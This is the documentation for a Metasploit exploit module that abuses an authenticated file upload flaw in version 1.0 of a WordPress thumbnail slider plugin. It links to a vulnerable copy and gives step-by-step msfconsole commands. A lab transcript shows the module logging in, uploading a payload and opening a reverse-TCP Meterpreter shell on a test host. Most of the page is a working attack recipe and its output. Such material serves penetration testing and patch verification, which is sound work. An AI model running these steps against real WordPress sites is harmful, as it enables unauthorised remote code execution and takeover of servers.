
## Vulnerable Application

  This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin
  v1.0 for WordPress post authentication.

  For testing purposes, you may download a vulnerable version [here](https://www.exploit-db.com/apps/f5d34e16d07e61ad6826d2c1f3d16089-wp-responsive-thumbnail-slider.zip).

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/wp_responsive_thumbnail_slider_upload```
  4. Do: ```set RHOSTS [IP]```
  5. Do: ```set TARGETURI [URI]```
  6. Do: ```set USERNAME [USERNAME]```
  7. Do: ```set PASSWORD [PASS]```
  8. Do: ```run```
  9. You should get a shell.

## Scenarios

### Test on Windows 7 x86 running WordPress v4.9.7

  ```
  msf5 > use exploit/multi/http/wp_responsive_thumbnail_slider_upload 
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set rhosts 192.168.37.165
  rhosts => 192.168.37.165
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set targeturi wordpress
  targeturi => wordpress
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set username test
  username => test
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set password password
  password => password
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > check
  [*] 192.168.37.165:80 The target service is running, but could not be validated.
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [*] WordPress accessed
  [+] Logged into WordPress
  [+] Successful upload
  [*] Sending stage (37775 bytes) to 192.168.37.165
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.165:54322) at 2018-07-26 14:41:02 -0500

  meterpreter > getuid
  Server username: lab (0)
  meterpreter > sysinfo
  Computer    : WIN7-LAB
  OS          : Windows NT WIN7-LAB 6.1 build 7601 (Windows 7 Ultimate Edition Service Pack 1) i586
  Meterpreter : php/windows
  meterpreter >

  ```
